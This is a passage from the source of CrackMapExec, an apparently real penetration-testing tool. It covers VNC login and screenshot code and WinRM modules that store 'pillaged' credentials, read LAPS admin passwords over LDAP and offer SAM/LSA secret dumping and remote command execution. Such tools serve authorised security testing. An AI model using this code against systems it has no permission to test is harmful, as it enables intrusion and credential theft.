[-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch
[-] This is probably because a newer version of CME is being ran on an old DB schema
[-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)
[-] Then remove the {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB"""
)
exit()
def shutdown_db(self):
try:
self.conn.close()
# due to the async nature of CME, sometimes session state is a bit messy and this will throw:
# Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and
# this would cause an unexpected state change to
except IllegalStateChangeError as e:
cme_logger.debug(f"Error while closing session db object: {e}")
def clear_database(self):
for table in self.metadata.sorted_tables:
self.conn.execute(table.delete())
================================================
FILE: cme/protocols/vnc/db_navigator.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cme.cmedb import DatabaseNavigator, print_help
class navigator(DatabaseNavigator):
def do_clear_database(self, line):
if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y":
self.db.clear_database()
def help_clear_database(self):
help_string = """
clear_database
THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE
YOU CANNOT UNDO THIS COMMAND
"""
print_help(help_string)
================================================
FILE: cme/protocols/vnc/proto_args.py
================================================
def proto_args(parser, std_parser, module_parser):
vnc_parser = parser.add_parser("vnc", help="own stuff using VNC", parents=[std_parser, module_parser])
vnc_parser.add_argument("--port", type=int, default=5900, help="Custom VNC port")
vnc_parser.add_argument("--vnc-sleep", type=int, default=5, help="VNC Sleep on socket connection to avoid rate limit")
egroup = vnc_parser.add_argument_group("Screenshot", "VNC Server")
egroup.add_argument("--screenshot", action="store_true", help="Screenshot VNC if connection success")
egroup.add_argument("--screentime", type=int, default=5, help="Time to wait for desktop image")
return parser
================================================
FILE: cme/protocols/vnc.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import asyncio
import os
from datetime import datetime
from aardwolf.commons.target import RDPTarget
from cme.connection import *
from cme.helpers.logger import highlight
from cme.logger import CMEAdapter
from aardwolf.vncconnection import VNCConnection
from aardwolf.commons.iosettings import RDPIOSettings
from aardwolf.commons.queuedata.constants import VIDEO_FORMAT
from asyauth.common.credentials import UniCredential
from asyauth.common.constants import asyauthSecret, asyauthProtocol
class vnc(connection):
def __init__(self, args, db, host):
self.iosettings = RDPIOSettings()
self.iosettings.channels = []
self.iosettings.video_out_format = VIDEO_FORMAT.RAW
self.iosettings.clipboard_use_pyperclip = False
self.url = None
self.target = None
self.credential = None
connection.__init__(self, args, db, host)
def proto_flow(self):
self.proto_logger()
if self.create_conn_obj():
self.print_host_info()
if self.login():
if hasattr(self.args, "module") and self.args.module:
self.call_modules()
else:
self.call_cmd_args()
def proto_logger(self):
self.logger = CMEAdapter(
extra={
"protocol": "VNC",
"host": self.host,
"port": self.args.port,
"hostname": self.hostname,
}
)
def print_host_info(self):
self.logger.display(f"VNC connecting to {self.hostname}")
def create_conn_obj(self):
try:
self.target = RDPTarget(ip=self.host, port=self.args.port)
credential = UniCredential(protocol=asyauthProtocol.PLAIN, stype=asyauthSecret.NONE)
self.conn = VNCConnection(target=self.target, credentials=credential, iosettings=self.iosettings)
asyncio.run(self.connect_vnc(True))
except Exception as e:
self.logger.debug(str(e))
if "Server supports:" not in str(e):
return False
return True
async def connect_vnc(self, discover=False):
_, err = await self.conn.connect()
if err is not None:
if not discover:
await asyncio.sleep(self.args.vnc_sleep)
raise err
return True
def plaintext_login(self, username, password):
try:
stype = asyauthSecret.PASS
if password == "":
stype = asyauthSecret.NONE
self.credential = UniCredential(secret=password, protocol=asyauthProtocol.PLAIN, stype=stype)
self.conn = VNCConnection(
target=self.target,
credentials=self.credential,
iosettings=self.iosettings,
)
asyncio.run(self.connect_vnc())
self.admin_privs = True
self.logger.success(
"{} {}".format(
password,
highlight(f"({self.config.get('CME', 'pwn3d_label')})" if self.admin_privs else ""),
)
)
return True
except Exception as e:
self.logger.debug(str(e))
if "Server supports: 1" in str(e):
self.logger.success(
"{} {}".format(
"No password seems to be accepted by the server",
highlight(f"({self.config.get('CME', 'pwn3d_label')})" if self.admin_privs else ""),
)
)
else:
self.logger.fail(f"{password} {'Authentication failed'}")
return False
async def screen(self):
self.conn = VNCConnection(target=self.target, credentials=self.credential, iosettings=self.iosettings)
await self.connect_vnc()
await asyncio.sleep(int(self.args.screentime))
if self.conn is not None and self.conn.desktop_buffer_has_data is True:
buffer = self.conn.get_desktop_buffer(VIDEO_FORMAT.PIL)
filename = os.path.expanduser(f"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png")
buffer.save(filename, "png")
self.logger.highlight(f"Screenshot saved {filename}")
def screenshot(self):
asyncio.run(self.screen())
================================================
FILE: cme/protocols/winrm/__init__.py
================================================
================================================
FILE: cme/protocols/winrm/database.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pathlib import Path
from sqlalchemy.dialects.sqlite import Insert
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy import MetaData, Table, select, func, delete
from sqlalchemy.exc import (
IllegalStateChangeError,
NoInspectionAvailable,
NoSuchTableError,
)
from cme.logger import cme_logger
class database:
def __init__(self, db_engine):
self.HostsTable = None
self.UsersTable = None
self.AdminRelationsTable = None
self.LoggedinRelationsTable = None
self.db_engine = db_engine
self.db_path = self.db_engine.url.database
self.protocol = Path(self.db_path).stem.upper()
self.metadata = MetaData()
self.reflect_tables()
session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)
Session = scoped_session(session_factory)
# this is still named "conn" when it is the session object; TODO: rename
self.conn = Session()
@staticmethod
def db_schema(db_conn):
db_conn.execute(
"""CREATE TABLE "hosts" (
"id" integer PRIMARY KEY,
"ip" text,
"port" integer,
"hostname" text,
"domain" text,
"os" text
)"""
)
db_conn.execute(
"""CREATE TABLE "users" (
"id" integer PRIMARY KEY,
"domain" text,
"username" text,
"password" text,
"credtype" text,
"pillaged_from_hostid" integer,
FOREIGN KEY(pillaged_from_hostid) REFERENCES hosts(id)
)"""
)
db_conn.execute(
"""CREATE TABLE "admin_relations" (
"id" integer PRIMARY KEY,
"userid" integer,
"hostid" integer,
FOREIGN KEY(userid) REFERENCES users(id),
FOREIGN KEY(hostid) REFERENCES hosts(id)
)"""
)
db_conn.execute(
"""CREATE TABLE "loggedin_relations" (
"id" integer PRIMARY KEY,
"userid" integer,
"hostid" integer,
FOREIGN KEY(userid) REFERENCES users(id),
FOREIGN KEY(hostid) REFERENCES hosts(id)
)"""
)
def reflect_tables(self):
with self.db_engine.connect() as conn:
try:
self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine)
self.UsersTable = Table("users", self.metadata, autoload_with=self.db_engine)
self.AdminRelationsTable = Table("admin_relations", self.metadata, autoload_with=self.db_engine)
self.LoggedinRelationsTable = Table("loggedin_relations", self.metadata, autoload_with=self.db_engine)
except (NoInspectionAvailable, NoSuchTableError):
print(
f"""
[-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch
[-] This is probably because a newer version of CME is being ran on an old DB schema
[-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)
[-] Then remove the {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB"""
)
exit()
def shutdown_db(self):
try:
self.conn.close()
# due to the async nature of CME, sometimes session state is a bit messy and this will throw:
# Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and
# this would cause an unexpected state change to
except IllegalStateChangeError as e:
cme_logger.debug(f"Error while closing session db object: {e}")
def clear_database(self):
for table in self.metadata.sorted_tables:
self.conn.execute(table.delete())
def add_host(self, ip, port, hostname, domain, os=None):
"""
Check if this host has already been added to the database, if not, add it in.
TODO: return inserted or updated row ids as a list
"""
domain = domain.split(".")[0].upper()
hosts = []
q = select(self.HostsTable).filter(self.HostsTable.c.ip == ip)
results = self.conn.execute(q).all()
cme_logger.debug(f"smb add_host() - hosts returned: {results}")
# create new host
if not results:
new_host = {
"ip": ip,
"port": port,
"hostname": hostname,
"domain": domain,
"os": os,
}
hosts = [new_host]
# update existing hosts data
else:
for host in results:
host_data = host._asdict()
# only update column if it is being passed in
if ip is not None:
host_data["ip"] = ip
if port is not None:
host_data["port"] = port
if hostname is not None:
host_data["hostname"] = hostname
if domain is not None:
host_data["domain"] = domain
if os is not None:
host_data["os"] = os
# only add host to be updated if it has changed
if host_data not in hosts:
hosts.append(host_data)
cme_logger.debug(f"Update Hosts: {hosts}")
# TODO: find a way to abstract this away to a single Upsert call
q = Insert(self.HostsTable)
update_columns = {col.name: col for col in q.excluded if col.name not in "id"}
q = q.on_conflict_do_update(index_elements=self.HostsTable.primary_key, set_=update_columns)
self.conn.execute(q, hosts)
def add_credential(self, credtype, domain, username, password, pillaged_from=None):
"""
Check if this credential has already been added to the database, if not add it in.
"""
domain = domain.split(".")[0].upper()
credentials = []
credential_data = {}
if credtype is not None:
credential_data["credtype"] = credtype
if domain is not None:
credential_data["domain"] = domain
if username is not None:
credential_data["username"] = username
if password is not None:
credential_data["password"] = password
if pillaged_from is not None:
credential_data["pillaged_from"] = pillaged_from
q = select(self.UsersTable).filter(
func.lower(self.UsersTable.c.domain) == func.lower(domain),
func.lower(self.UsersTable.c.username) == func.lower(username),
func.lower(self.UsersTable.c.credtype) == func.lower(credtype),
)
results = self.conn.execute(q).all()
# add new credential
if not results:
new_cred = {
"credtype": credtype,
"domain": domain,
"username": username,
"password": password,
"pillaged_from": pillaged_from,
}
credentials = [new_cred]
# update existing cred data
else:
for creds in results:
# this will include the id, so we don't touch it
cred_data = creds._asdict()
# only update column if it is being passed in
if credtype is not None:
cred_data["credtype"] = credtype
if domain is not None:
cred_data["domain"] = domain
if username is not None:
cred_data["username"] = username
if password is not None:
cred_data["password"] = password
if pillaged_from is not None:
cred_data["pillaged_from"] = pillaged_from
# only add cred to be updated if it has changed
if cred_data not in credentials:
credentials.append(cred_data)
# TODO: find a way to abstract this away to a single Upsert call
q_users = Insert(self.UsersTable) # .returning(self.UsersTable.c.id)
update_columns_users = {col.name: col for col in q_users.excluded if col.name not in "id"}
q_users = q_users.on_conflict_do_update(index_elements=self.UsersTable.primary_key, set_=update_columns_users)
self.conn.execute(q_users, credentials) # .scalar()
# return user_ids
def remove_credentials(self, creds_id):
"""
Removes a credential ID from the database
"""
del_hosts = []
for cred_id in creds_id:
q = delete(self.UsersTable).filter(self.UsersTable.c.id == cred_id)
del_hosts.append(q)
self.conn.execute(q)
def add_admin_user(self, credtype, domain, username, password, host, user_id=None):
domain = domain.split(".")[0]
add_links = []
creds_q = select(self.UsersTable)
if user_id:
creds_q = creds_q.filter(self.UsersTable.c.id == user_id)
else:
creds_q = creds_q.filter(
func.lower(self.UsersTable.c.credtype) == func.lower(credtype),
func.lower(self.UsersTable.c.domain) == func.lower(domain),
func.lower(self.UsersTable.c.username) == func.lower(username),
self.UsersTable.c.password == password,
)
users = self.conn.execute(creds_q)
hosts = self.get_hosts(host)
if users and hosts:
for user, host in zip(users, hosts):
user_id = user[0]
host_id = host[0]
link = {"userid": user_id, "hostid": host_id}
admin_relations_select = select(self.AdminRelationsTable).filter(
self.AdminRelationsTable.c.userid == user_id,
self.AdminRelationsTable.c.hostid == host_id,
)
links = self.conn.execute(admin_relations_select).all()
if not links:
add_links.append(link)
admin_relations_insert = Insert(self.AdminRelationsTable)
self.conn.execute(admin_relations_insert, add_links)
def get_admin_relations(self, user_id=None, host_id=None):
if user_id:
q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.userid == user_id)
elif host_id:
q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.hostid == host_id)
else:
q = select(self.AdminRelationsTable)
results = self.conn.execute(q).all()
return results
def remove_admin_relation(self, user_ids=None, host_ids=None):
q = delete(self.AdminRelationsTable)
if user_ids:
for user_id in user_ids:
q = q.filter(self.AdminRelationsTable.c.userid == user_id)
elif host_ids:
for host_id in host_ids:
q = q.filter(self.AdminRelationsTable.c.hostid == host_id)
self.conn.execute(q)
def is_credential_valid(self, credential_id):
"""
Check if this credential ID is valid.
"""
q = select(self.UsersTable).filter(
self.UsersTable.c.id == credential_id,
self.UsersTable.c.password is not None,
)
results = self.conn.execute(q).all()
return len(results) > 0
def get_credentials(self, filter_term=None, cred_type=None):
"""
Return credentials from the database.
"""
# if we're returning a single credential by ID
if self.is_credential_valid(filter_term):
q = select(self.UsersTable).filter(self.UsersTable.c.id == filter_term)
elif cred_type:
q = select(self.UsersTable).filter(self.UsersTable.c.credtype == cred_type)
# if we're filtering by username
elif filter_term and filter_term != "":
like_term = func.lower(f"%{filter_term}%")
q = select(self.UsersTable).filter(func.lower(self.UsersTable.c.username).like(like_term))
# otherwise return all credentials
else:
q = select(self.UsersTable)
results = self.conn.execute(q).all()
return results
def is_credential_local(self, credential_id):
q = select(self.UsersTable.c.domain).filter(self.UsersTable.c.id == credential_id)
user_domain = self.conn.execute(q).all()
if user_domain:
q = select(self.HostsTable).filter(func.lower(self.HostsTable.c.id) == func.lower(user_domain))
results = self.conn.execute(q).all()
return len(results) > 0
def is_host_valid(self, host_id):
"""
Check if this host ID is valid.
"""
q = select(self.HostsTable).filter(self.HostsTable.c.id == host_id)
results = self.conn.execute(q).all()
return len(results) > 0
def get_hosts(self, filter_term=None):
"""
Return hosts from the database.
"""
q = select(self.HostsTable)
# if we're returning a single host by ID
if self.is_host_valid(filter_term):
q = q.filter(self.HostsTable.c.id == filter_term)
results = self.conn.execute(q).first()
# all() returns a list, so we keep the return format the same so consumers don't have to guess
return [results]
# if we're filtering by domain controllers
elif filter_term is not None and filter_term.startswith("domain"):
domain = filter_term.split()[1]
like_term = func.lower(f"%{domain}%")
q = q.filter(self.HostsTable.c.domain.like(like_term))
# if we're filtering by ip/hostname
elif filter_term and filter_term != "":
like_term = func.lower(f"%{filter_term}%")
q = q.filter(self.HostsTable.c.ip.like(like_term) | func.lower(self.HostsTable.c.hostname).like(like_term))
results = self.conn.execute(q).all()
cme_logger.debug(f"winrm get_hosts() - results: {results}")
return results
def is_user_valid(self, user_id):
"""
Check if this User ID is valid.
"""
q = select(self.UsersTable).filter(self.UsersTable.c.id == user_id)
results = self.conn.execute(q).all()
return len(results) > 0
def get_users(self, filter_term=None):
q = select(self.UsersTable)
if self.is_user_valid(filter_term):
q = q.filter(self.UsersTable.c.id == filter_term)
# if we're filtering by username
elif filter_term and filter_term != "":
like_term = func.lower(f"%{filter_term}%")
q = q.filter(func.lower(self.UsersTable.c.username).like(like_term))
results = self.conn.execute(q).all()
return results
def get_user(self, domain, username):
q = select(self.UsersTable).filter(
func.lower(self.UsersTable.c.domain) == func.lower(domain),
func.lower(self.UsersTable.c.username) == func.lower(username),
)
results = self.conn.execute(q).all()
return results
def add_loggedin_relation(self, user_id, host_id):
relation_query = select(self.LoggedinRelationsTable).filter(
self.LoggedinRelationsTable.c.userid == user_id,
self.LoggedinRelationsTable.c.hostid == host_id,
)
results = self.conn.execute(relation_query).all()
# only add one if one doesn't already exist
if not results:
relation = {"userid": user_id, "hostid": host_id}
try:
# TODO: find a way to abstract this away to a single Upsert call
q = Insert(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id)
self.conn.execute(q, [relation]) # .scalar()
# return inserted_ids
except Exception as e:
cme_logger.debug(f"Error inserting LoggedinRelation: {e}")
def get_loggedin_relations(self, user_id=None, host_id=None):
q = select(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id)
if user_id:
q = q.filter(self.LoggedinRelationsTable.c.userid == user_id)
if host_id:
q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)
results = self.conn.execute(q).all()
return results
def remove_loggedin_relations(self, user_id=None, host_id=None):
q = delete(self.LoggedinRelationsTable)
if user_id:
q = q.filter(self.LoggedinRelationsTable.c.userid == user_id)
elif host_id:
q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)
self.conn.execute(q)
================================================
FILE: cme/protocols/winrm/db_navigator.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cme.cmedb import DatabaseNavigator, print_help, print_table
from cme.helpers.misc import validate_ntlm
class navigator(DatabaseNavigator):
def display_creds(self, creds):
data = [["CredID", "Admin On", "CredType", "Domain", "UserName", "Password"]]
for cred in creds:
cred_id = cred[0]
domain = cred[1]
username = cred[2]
password = cred[3]
credtype = cred[4]
# pillaged_from = cred[5]
links = self.db.get_admin_relations(user_id=cred_id)
data.append(
[
cred_id,
str(len(links)) + " Host(s)",
credtype,
domain,
username,
password,
]
)
print_table(data, title="Credentials")
def display_hosts(self, hosts):
data = [["HostID", "Admins", "IP", "Port", "Hostname", "Domain", "OS"]]
for host in hosts:
host_id = host[0]
ip = host[1]
port = host[2]
hostname = host[3]
domain = host[4]
try:
os = host[5].decode()
except:
os = host[5]
links = self.db.get_admin_relations(host_id=host_id)
data.append(
[
host_id,
str(len(links)) + " Cred(s)",
ip,
port,
hostname,
domain,
os,
]
)
print_table(data, title="Hosts")
def do_hosts(self, line):
filter_term = line.strip()
if filter_term == "":
hosts = self.db.get_hosts()
self.display_hosts(hosts)
else:
hosts = self.db.get_hosts(filter_term=filter_term)
if len(hosts) > 1:
self.display_hosts(hosts)
elif len(hosts) == 1:
data = [["HostID", "IP", "Port", "Hostname", "Domain", "OS"]]
host_id_list = []
for host in hosts:
host_id = host[0]
host_id_list.append(host_id)
ip = host[1]
port = host[2]
hostname = host[3]
domain = host[4]
try:
os = host[5].decode()
except:
os = host[5]
data.append([host_id, ip, port, hostname, domain, os])
print_table(data, title="Host")
data = [["CredID", "CredType", "Domain", "UserName", "Password"]]
for host_id in host_id_list:
links = self.db.get_admin_relations(host_id=host_id)
for link in links:
link_id, cred_id, host_id = link
creds = self.db.get_credentials(filter_term=cred_id)
for cred in creds:
cred_id = cred[0]
domain = cred[1]
username = cred[2]
password = cred[3]
credtype = cred[4]
# pillaged_from = cred[5]
data.append([cred_id, credtype, domain, username, password])
print_table(data, title="Credential(s) with Admin Access")
def help_hosts(self):
help_string = """
hosts [filter_term]
By default prints all hosts
Table format:
| 'HostID', 'IP', 'Port', 'Hostname', 'Domain', 'OS' |
Subcommands:
filter_term - filters hosts with filter_term
If a single host is returned (e.g. `hosts 15`, it prints the following tables:
Host | 'HostID', 'IP', 'Hostname', 'Domain', 'OS', 'DC', 'SMBv1', 'Signing', 'Spooler', 'Zerologon', 'PetitPotam' |
Credential(s) with Admin Access | 'CredID', 'CredType', 'Domain', 'UserName', 'Password' |
Otherwise, it prints the default host table from a `like` query on the `ip` and `hostname` columns
"""
print_help(help_string)
def do_creds(self, line):
filter_term = line.strip()
if filter_term == "":
creds = self.db.get_credentials()
self.display_creds(creds)
elif filter_term.split()[0].lower() == "add":
# add format: "domain username password
args = filter_term.split()[1:]
if len(args) == 3:
domain, username, password = args
if validate_ntlm(password):
self.db.add_credential("hash", domain, username, password)
else:
self.db.add_credential("plaintext", domain, username, password)
else:
print("[!] Format is 'add domain username password")
return
elif filter_term.split()[0].lower() == "remove":
args = filter_term.split()[1:]
if len(args) != 1:
print("[!] Format is 'remove '")
return
else:
self.db.remove_credentials(args)
self.db.remove_admin_relation(user_ids=args)
elif filter_term.split()[0].lower() == "plaintext":
creds = self.db.get_credentials(cred_type="plaintext")
self.display_creds(creds)
elif filter_term.split()[0].lower() == "hash":
creds = self.db.get_credentials(cred_type="hash")
self.display_creds(creds)
else:
creds = self.db.get_credentials(filter_term=filter_term)
if len(creds) != 1:
self.display_creds(creds)
elif len(creds) == 1:
data = [
[
"CredID",
"CredType",
"Pillaged From HostID",
"Domain",
"UserName",
"Password",
]
]
cred_id_list = []
for cred in creds:
cred_id = cred[0]
cred_id_list.append(cred_id)
domain = cred[1]
username = cred[2]
password = cred[3]
credtype = cred[4]
pillaged_from = cred[5]
data.append([cred_id, credtype, pillaged_from, domain, username, password])
print_table(data, title="Credential(s)")
data = [["HostID", "IP", "Hostname", "Domain", "OS"]]
for cred_id in cred_id_list:
links = self.db.get_admin_relations(user_id=cred_id)
for link in links:
link_id, cred_id, host_id = link
hosts = self.db.get_hosts(host_id)
for host in hosts:
host_id = host[0]
ip = host[1]
hostname = host[2]
domain = host[3]
os = host[4]
data.append([host_id, ip, hostname, domain, os])
print_table(data, title="Admin Access to Host(s)")
def help_creds(self):
help_string = """
creds [add|remove|plaintext|hash|filter_term]
By default prints all creds
Table format:
| 'CredID', 'Admin On', 'CredType', 'Domain', 'UserName', 'Password' |
Subcommands:
add - format: "add domain username password "
remove - format: "remove "
plaintext - prints plaintext creds
hash - prints hashed creds
filter_term - filters creds with filter_term
If a single credential is returned (e.g. `creds 15`, it prints the following tables:
Credential(s) | 'CredID', 'CredType', 'Pillaged From HostID', 'Domain', 'UserName', 'Password' |
Member of Group(s) | 'GroupID', 'Domain', 'Name' |
Admin Access to Host(s) | 'HostID', 'IP', 'Hostname', 'Domain', 'OS'
Otherwise, it prints the default credential table from a `like` query on the `username` column
"""
print_help(help_string)
def do_clear_database(self, line):
if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y":
self.db.clear_database()
def help_clear_database(self):
help_string = """
clear_database
THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE
YOU CANNOT UNDO THIS COMMAND
"""
print_help(help_string)
================================================
FILE: cme/protocols/winrm/proto_args.py
================================================
from argparse import _StoreTrueAction
def proto_args(parser, std_parser, module_parser):
winrm_parser = parser.add_parser("winrm", help="own stuff using WINRM", parents=[std_parser, module_parser])
winrm_parser.add_argument("-H", "--hash", metavar="HASH", dest="hash", nargs="+", default=[], help="NTLM hash(es) or file(s) containing NTLM hashes")
winrm_parser.add_argument("--port", type=int, default=0, help="Custom WinRM port")
winrm_parser.add_argument("--ssl", action="store_true", help="Connect to SSL Enabled WINRM")
winrm_parser.add_argument("--ignore-ssl-cert", action="store_true", help="Ignore Certificate Verification")
winrm_parser.add_argument("--laps", dest="laps", metavar="LAPS", type=str, help="LAPS authentification", nargs="?", const="administrator")
winrm_parser.add_argument("--http-timeout", dest="http_timeout", type=int, default=10, help="HTTP timeout for WinRM connections")
no_smb_arg = winrm_parser.add_argument("--no-smb", action=get_conditional_action(_StoreTrueAction), make_required=[], help='No smb connection')
dgroup = winrm_parser.add_mutually_exclusive_group()
domain_arg = dgroup.add_argument("-d", metavar="DOMAIN", dest="domain", type=str, default=None, help="domain to authenticate to")
dgroup.add_argument("--local-auth", action="store_true", help="authenticate locally to each target")
no_smb_arg.make_required = [domain_arg]
cgroup = winrm_parser.add_argument_group("Credential Gathering", "Options for gathering credentials")
cegroup = cgroup.add_mutually_exclusive_group()
cegroup.add_argument("--sam", action="store_true", help="dump SAM hashes from target systems")
cegroup.add_argument("--lsa", action="store_true", help="dump LSA secrets from target systems")
cgroup = winrm_parser.add_argument_group("Command Execution", "Options for executing commands")
cgroup.add_argument("--codec", default="utf-8",
help="Set encoding used (codec) from the target's output (default "
"\"utf-8\"). If errors are detected, run chcp.com at the target, "
"map the result with "
"https://docs.python.org/3/library/codecs.html#standard-encodings and then execute "
"again with --codec and the corresponding codec")
cgroup.add_argument("--no-output", action="store_true", help="do not retrieve command output")
cgroup.add_argument("-x", metavar="COMMAND", dest="execute", help="execute the specified command")
cgroup.add_argument("-X", metavar="PS_COMMAND", dest="ps_execute", help="execute the specified PowerShell command")
return parser
def get_conditional_action(baseAction):
class ConditionalAction(baseAction):
def __init__(self, option_strings, dest, **kwargs):
x = kwargs.pop('make_required', [])
super(ConditionalAction, self).__init__(option_strings, dest, **kwargs)
self.make_required = x
def __call__(self, parser, namespace, values, option_string=None):
for x in self.make_required:
x.required = True
super(ConditionalAction, self).__call__(parser, namespace, values, option_string)
return ConditionalAction
================================================
FILE: cme/protocols/winrm.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import binascii
import hashlib
import os
import requests
from io import StringIO
from datetime import datetime
from pypsrp.client import Client
from impacket.smbconnection import SMBConnection
from impacket.examples.secretsdump import LocalOperations, LSASecrets, SAMHashes
from cme.config import process_secret
from cme.connection import *
from cme.helpers.bloodhound import add_user_bh
from cme.protocols.ldap.laps import LDAPConnect, LAPSv2Extract
from cme.logger import CMEAdapter
class winrm(connection):
def __init__(self, args, db, host):
self.domain = None
self.server_os = None
self.output_filename = None
self.endpoint = None
self.port = None
self.hash = None
self.lmhash = None
self.nthash = None
connection.__init__(self, args, db, host)
def proto_logger(self):
self.logger = CMEAdapter(
extra={
"protocol": "WINRM",
"host": self.host,
"port": self.args.port if self.args.port else 5985,
"hostname": self.hostname,
}
)
def enum_host_info(self):
# smb no open, specify the domain
if self.args.no_smb:
self.domain = self.args.domain
else:
# try:
smb_conn = SMBConnection(self.host, self.host, None, timeout=5)
no_ntlm = False
try:
smb_conn.login("", "")
except BrokenPipeError:
self.logger.fail(f"Broken Pipe Error while attempting to login")
except Exception as e:
if "STATUS_NOT_SUPPORTED" in str(e):
# no ntlm supported
no_ntlm = True
pass
self.domain = smb_conn.getServerDNSDomainName() if not no_ntlm else self.args.domain
self.hostname = smb_conn.getServerName() if not no_ntlm else self.host
self.server_os = smb_conn.getServerOS()
if isinstance(self.server_os.lower(), bytes):
self.server_os = self.server_os.decode("utf-8")
self.logger.extra["hostname"] = self.hostname
self.output_filename = os.path.expanduser(f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}")
try:
smb_conn.logoff()
except:
pass
# except Exception as e:
# self.logger.fail(
# f"Error retrieving host domain: {e} specify one manually with the '-d' flag"
# )
if self.args.domain:
self.domain = self.args.domain
if self.args.local_auth:
self.domain = self.hostname
if self.server_os is None:
self.server_os = ""
if self.domain is None:
self.domain = ""
self.db.add_host(self.host, self.port, self.hostname, self.domain, self.server_os)
self.output_filename = os.path.expanduser(f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}".replace(":", "-"))
def laps_search(self, username, password, ntlm_hash, domain):
ldapco = LDAPConnect(self.domain, "389", self.domain)
if self.kerberos:
if self.kdcHost is None:
self.logger.fail("Add --kdcHost parameter to use laps with kerberos")
return False
connection = ldapco.kerberos_login(
domain,
username[0] if username else "",
password[0] if password else "",
ntlm_hash[0] if ntlm_hash else "",
kdcHost=self.kdcHost,
aesKey=self.aesKey,
)
else:
connection = ldapco.auth_login(
domain,
username[0] if username else "",
password[0] if password else "",
ntlm_hash[0] if ntlm_hash else "",
)
if not connection:
self.logger.fail("LDAP connection failed with account {}".format(username[0]))
return False
search_filter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" + self.hostname + "))"
attributes = [
"msLAPS-EncryptedPassword",
"msLAPS-Password",
"ms-MCS-AdmPwd",
"sAMAccountName",
]
results = connection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0)
msMCSAdmPwd = ""
sAMAccountName = ""
username_laps = ""
from impacket.ldap import ldapasn1 as ldapasn1_impacket
results = [r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry)]
if len(results) != 0:
for host in results:
values = {str(attr["type"]).lower(): attr["vals"][0] for attr in host["attributes"]}
if "mslaps-encryptedpassword" in values:
from json import loads
msMCSAdmPwd = values["mslaps-encryptedpassword"]
d = LAPSv2Extract(
bytes(msMCSAdmPwd),
username[0] if username else "",
password[0] if password else "",
domain,
ntlm_hash[0] if ntlm_hash else "",
self.args.kerberos,
self.args.kdcHost,
339)
data = d.run()
r = loads(data)
msMCSAdmPwd = r["p"]
username_laps = r["n"]
elif "mslaps-password" in values:
from json import loads
r = loads(str(values["mslaps-password"]))
msMCSAdmPwd = r["p"]
username_laps = r["n"]
elif "ms-mcs-admpwd" in values:
msMCSAdmPwd = str(values["ms-mcs-admpwd"])
else:
self.logger.fail("No result found with attribute ms-MCS-AdmPwd or" " msLAPS-Password")
self.logger.debug("Host: {:<20} Password: {} {}".format(sAMAccountName, msMCSAdmPwd, self.hostname))
else:
self.logger.fail("msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS" " property for {}".format(self.hostname))
return False
self.username = self.args.laps if not username_laps else username_laps
self.password = msMCSAdmPwd
if msMCSAdmPwd == "":
self.logger.fail("msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS" " property for {}".format(self.hostname))
return False
if ntlm_hash:
hash_ntlm = hashlib.new("md4", msMCSAdmPwd.encode("utf-16le")).digest()
self.hash = binascii.hexlify(hash_ntlm).decode()
self.domain = self.hostname
return True
def print_host_info(self):
if self.args.domain:
self.logger.extra["protocol"] = "HTTP"
self.logger.display(self.endpoint)
else:
self.logger.extra["protocol"] = "SMB"
self.logger.display(f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})")
self.logger.extra["protocol"] = "HTTP"
self.logger.display(self.endpoint)
if self.args.laps:
return self.laps_search(self.args.username, self.args.password, self.args.hash, self.domain)
return True
def create_conn_obj(self):
endpoints = [
f"https://{self.host}:{self.args.port if self.args.port else 5986}/wsman",
f"http://{self.host}:{self.args.port if self.args.port else 5985}/wsman",
]
for url in endpoints:
try:
self.logger.debug(f"winrm create_conn_obj() - Requesting URL: {url}")
res = requests.post(url, verify=False, timeout=self.args.http_timeout)
self.logger.debug("winrm create_conn_obj() - Received response code:" f" {res.status_code}")
self.endpoint = url
if self.endpoint.startswith("https://"):
self.logger.extra["port"] = self.args.port if self.args.port else 5986
else:
self.logger.extra["port"] = self.args.port if self.args.port else 5985
return True
except requests.exceptions.Timeout as e:
self.logger.info(f"Connection Timed out to WinRM service: {e}")
except requests.exceptions.ConnectionError as e:
if "Max retries exceeded with url" in str(e):
